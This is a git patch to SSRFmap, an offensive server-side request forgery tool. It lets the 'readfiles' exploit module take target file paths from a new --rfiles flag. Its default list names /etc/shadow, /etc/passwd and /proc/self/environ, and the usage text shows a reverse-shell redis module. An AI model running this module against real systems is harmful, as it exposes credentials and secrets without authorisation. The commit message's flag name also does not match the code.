From 7055df63151b77e67a36948f0840c69c79db5f61 Mon Sep 17 00:00:00 2001 From: Mateus Pimentel Date: Tue, 2 Feb 2021 19:34:38 -0300 Subject: [PATCH] Added the possibility to specify files via the --rflags parameter when using the readfiles module. --- modules/readfiles.py | 14 +++++++++++--- ssrfmap.py | 6 ++++-- 2 files changed, 15 insertions(+), 5 deletions(-) diff --git a/modules/readfiles.py b/modules/readfiles.py index fa62848..8d1fc32 100644 --- a/modules/readfiles.py +++ b/modules/readfiles.py @@ -1,6 +1,10 @@ from core.utils import * import logging import os +from argparse import ArgumentParser + +#parser.add_argument("-f", "--file", dest="filename", +# help="write report to FILE", metavar="FILE") name = "readfiles" description = "Read files from the target" @@ -8,12 +12,13 @@ author = "Swissky" documentation = [] class exploit(): - files = ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"] - + def __init__(self, requester, args): logging.info("Module '{}' launched !".format(name)) - + self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"] + r = requester.do_request(args.param, "") + if r != None: default = r.text @@ -36,3 +41,6 @@ class exploit(): logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename)) with open(directory + "/" + filename, 'w') as f: f.write(diff) + + else: + print("Empty response") diff --git a/ssrfmap.py b/ssrfmap.py index 2a58e26..2d1d1eb 100644 --- a/ssrfmap.py +++ b/ssrfmap.py @@ -23,6 +23,7 @@ def parse_args(): python ssrfmap.py -r data/request.txt -p url -m redis python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent" python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242 + python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles ''' parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file") @@ -32,10 +33,11 @@ def parse_args(): parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True) parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell") parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell") + parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True) parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use") parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True) parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int) - results = parser.parse_args() + results = parser.parse_args() if results.reqfile == None: parser.print_help() @@ -55,4 +57,4 @@ if __name__ == "__main__": # SSRFmap args = parse_args() - ssrf = SSRF(args) \ No newline at end of file + ssrf = SSRF(args)